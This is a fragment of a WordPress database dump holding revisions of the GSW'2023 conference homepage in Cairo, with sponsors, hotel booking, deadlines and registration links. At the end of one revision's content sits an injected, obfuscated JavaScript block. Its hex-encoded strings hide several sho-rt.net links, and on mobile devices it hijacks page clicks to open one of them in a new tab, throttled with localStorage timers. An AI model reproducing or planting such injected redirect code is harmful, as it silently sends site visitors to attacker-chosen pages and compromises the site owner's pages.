link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 06:04:50','2023-05-17 06:04:50','',3066,'https://gsw2023.com/?p=4540',0,'revision','',0),
(4541,1,'2023-05-17 06:06:01','2023-05-17 06:06:01','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt; color: #ffffff;\">BOOK YOUR HOTEL NOW</span></strong></h4>\n<h4></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">(InterContinental Cairo Semiramis)</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684303522001{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text 